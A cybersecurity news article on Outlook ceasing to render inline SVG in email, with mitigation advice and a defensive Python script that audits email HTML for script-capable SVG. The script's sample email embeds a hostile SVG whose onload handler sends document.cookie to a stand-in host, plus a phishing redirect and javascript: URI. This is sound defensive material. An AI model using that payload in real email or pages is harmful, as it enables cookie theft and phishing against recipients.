Outlook to Stop Rendering Inline SVG in Email to Reduce XSS Risk

CyberSecureFox 🦊

Microsoft is rolling out a change to its email ecosystem: the web version of Outlook and the new Outlook for Windows will stop rendering inline SVG images. The phased rollout began in early September 2025 and is scheduled to complete by mid-October 2025. According to Microsoft, the change will affect fewer than 0.1% of all images sent through Outlook, suggesting negligible impact on typical business communications.

Why Microsoft is disabling inline SVG in Outlook: reducing XSS and filter evasion

SVG (Scalable Vector Graphics) is an XML-based format, and the format itself is script-capable: an SVG document may contain script elements, event-handler attributes such as onload on any element, links with javascript: URIs, foreignObject elements that wrap arbitrary HTML, and href references that pull in external resources. When SVG is embedded directly in the HTML body of an email, any gap in the mail client's sanitizer lets that content run in the client's own web context, which is cross-site scripting (XSS) against the recipient. Practical consequences include session token theft, UI redressing, and convincing in-client phishing flows, all without delivering a traditional executable.

Threat actors have increasingly weaponized SVG to evade legacy detections. Security researchers observed a surge in SVG-laden phishing emails in late 2024, as adversaries used the format to bypass signature-based checks. Trustwave reported in April 2025 that SVG-driven phishing activity increased by 1,800% compared to April 2024 (Trustwave SpiderLabs). In late September 2025, Microsoft also documented a campaign leveraging LLM-generated SVG files to undermine mail protections (Microsoft Threat Intelligence).

What Outlook users will see—and what still works

Once enforcement takes effect, inline SVG will no longer render in the message body; users will see empty space where those images would have appeared. SVG files sent as standard attachments remain supported and will be accessible from the attachments pane as usual. The change therefore targets the one place where SVG content could execute inside the mail client's own rendering context, while preserving legitimate workflows that exchange vector graphics as files. It does not cover SVG delivered as an attachment, which still opens outside the mail client (typically in the browser) when the recipient clicks it, so attachment inspection and download controls remain necessary.

Part of Microsoft’s broader email-security hardening

The SVG decision aligns with Microsoft’s ongoing effort to minimize dangerous patterns in Office and Windows. In June 2025, Microsoft announced that the web version of Outlook and the new Outlook for Windows block .library-ms and .search-ms attachments, file types repeatedly abused in targeted attacks since at least mid-2022 (Microsoft 365 roadmap/message center). Microsoft maintains and regularly updates an official list of blocked file types for Outlook.

Operational guidance for IT and marketing teams

Replace inline SVG with safer formats. Use PNG or WebP for images in the email body. If vector fidelity is required, serve the SVG from a trusted host and reference it as an image (an img element whose src points at the file) rather than embedding the markup: loaded that way, the browser treats the SVG as a static picture and does not run its scripts or fetch its external references. Sanitize any SVG you generate from dynamic data before publishing it, and remember that many clients block remote images until the recipient allows them.

Harden mail defenses end-to-end. Tighten attachment and URL filtering (SVG attachments are not covered by the rendering change and should be treated like any other active content), enforce domain authentication (SPF, DKIM, and DMARC with an enforcing policy), and enable safe-link rewriting and time-of-click URL checks in the secure email gateway.

Reinforce phishing awareness. Train users to scrutinize unexpected attachments or login prompts, especially those embedded in emails that appear legitimate at a glance.

Audit templates and landing pages. Review email templates and campaign assets for inline SVG dependencies, including SVG injected by template engines or exported directly into HTML by design tools. Provide raster fallbacks with alt text, and test-send to Outlook on the web to confirm rendering while maintaining brand consistency and accessibility.
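As an added example, not code from this page or from Microsoft, the script below puts the earlier description of script-capable SVG and the template-audit step above into working form. It parses an HTML email body with Python's standard html.parser, locates every inline svg element, and records the features named earlier (script elements, on* event handlers, javascript: URIs, external href references, foreignObject). The sample email and every hostname in it are constructed for the example; the class and function names are the example's own.

```python
"""Audit an HTML e-mail body or template for inline SVG and flag the script-capable
SVG features that make it an XSS vector. Added example with its own names."""
import re
from dataclasses import dataclass, field
from html.parser import HTMLParser

# Constructed sample: one benign inline SVG logo, then one inline SVG carrying the
# classic script-bearing patterns. All hostnames are made up.
SAMPLE_EMAIL_HTML = """<html><body>
<p>Hello,</p>
<svg xmlns="http://www.w3.org/2000/svg" width="120" height="40" viewBox="0 0 120 40">
  <rect width="120" height="40" fill="#0a66c2"/>
  <text x="10" y="26" fill="#fff">ACME</text>
</svg>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     width="1" height="1" onload="fetch('https://collector.example/' + document.cookie)">
  <script>location.href = 'https://login.example/verify';</script>
  <image xlink:href="https://tracker.example/pixel.svg" width="1" height="1"/>
  <a xlink:href="javascript:void(0)"><text x="0" y="10">View</text></a>
  <foreignObject width="300" height="100"><div xmlns="http://www.w3.org/1999/xhtml">Sign in</div></foreignObject>
</svg>
</body></html>"""

EVENT_ATTR = re.compile(r"^on[a-z]+$", re.I)            # onload, onclick, ...
SCRIPT_URI = re.compile(r"^\s*javascript:", re.I)        # javascript: in any attribute
EXTERNAL_URL = re.compile(r"^\s*(?:https?:)?//", re.I)   # remote resource reference
REF_ATTRS = {"href", "xlink:href", "src"}                # attributes that load or link

@dataclass
class SvgFinding:
    """What one top-level inline <svg> element contains."""
    index: int
    has_script: bool = False
    foreign_object: bool = False
    event_handlers: list = field(default_factory=list)
    script_uris: list = field(default_factory=list)
    external_refs: list = field(default_factory=list)

    @property
    def risky(self) -> bool:
        return bool(self.has_script or self.foreign_object or self.event_handlers
                    or self.script_uris or self.external_refs)

class InlineSvgAuditor(HTMLParser):
    """Single pass over the HTML; only markup nested inside <svg> is inspected.
    HTMLParser lowercases names, so foreignObject arrives as 'foreignobject'."""
    def __init__(self):
        super().__init__()
        self.findings = []
        self._depth = 0          # nesting depth inside the current <svg>
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag == "svg":
            if self._depth == 0:
                self._current = SvgFinding(index=len(self.findings))
                self.findings.append(self._current)
            self._depth += 1
        if self._depth == 0:
            return               # ordinary HTML outside any inline SVG
        f = self._current
        if tag == "script":
            f.has_script = True
        elif tag == "foreignobject":
            f.foreign_object = True
        for name, value in attrs:  # the <svg> root's own attributes are checked too
            value = (value or "").strip()
            if EVENT_ATTR.match(name):
                f.event_handlers.append(name)
            elif SCRIPT_URI.match(value):
                f.script_uris.append(value)
            elif name in REF_ATTRS and EXTERNAL_URL.match(value):
                f.external_refs.append(value)

    def handle_endtag(self, tag):
        if tag == "svg" and self._depth > 0:
            self._depth -= 1

def audit_email_html(html):
    """Return one SvgFinding per top-level inline <svg> in the HTML."""
    auditor = InlineSvgAuditor()
    auditor.feed(html)
    auditor.close()
    return auditor.findings

def describe(f):
    """One audit-log line per inline SVG, for the template review."""
    if not f.risky:
        return f"svg#{f.index}: static vector art, safe to convert to PNG"
    parts = [label for cond, label in (
        (f.has_script, "script element"),
        (f.event_handlers, "event handlers " + ",".join(f.event_handlers)),
        (f.script_uris, "javascript: URIs " + ",".join(f.script_uris)),
        (f.external_refs, "external refs " + ",".join(f.external_refs)),
        (f.foreign_object, "foreignObject (embedded HTML)")) if cond]
    return f"svg#{f.index}: RISKY: " + "; ".join(parts)

if __name__ == "__main__":
    for finding in audit_email_html(SAMPLE_EMAIL_HTML):
        print(describe(finding))
```

Run it over exported templates to get one line per inline SVG: static logos are safe to rasterize, while anything reported as RISKY is exactly the kind of markup a mail client's sanitizer must strip and that Outlook will now refuse to render. The same logic can triage inbound mail at a gateway, but it is a detector, not a sanitizer: a real sanitizer rebuilds the SVG from an allowlist of elements and attributes rather than looking for known-bad ones.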

Security impact and next steps

Blocking the rendering of inline SVG removes a path for script execution inside the email body, which complicates XSS and dynamic phishing techniques that depend on the mail client running attacker-controlled markup. It does not eliminate email-borne risk: links, SVG and other file attachments, and HTML outside the SVG element remain viable vectors. Still, it materially reduces exposure in one of the most targeted layers of the attack chain. As deployment completes by mid-October 2025, legitimate communications should see minimal disruption and the security baseline for Outlook tenants should rise.

Organizations can maximize the benefit by pairing this control with layered defenses: modern anti-phishing policies, rigorous attachment and URL inspection, strict domain authentication, and ongoing user education. Transitioning away from inline SVG in marketing and transactional emails—and standardizing on safer image formats—will help preserve campaign performance without expanding the attack surface for adversaries.
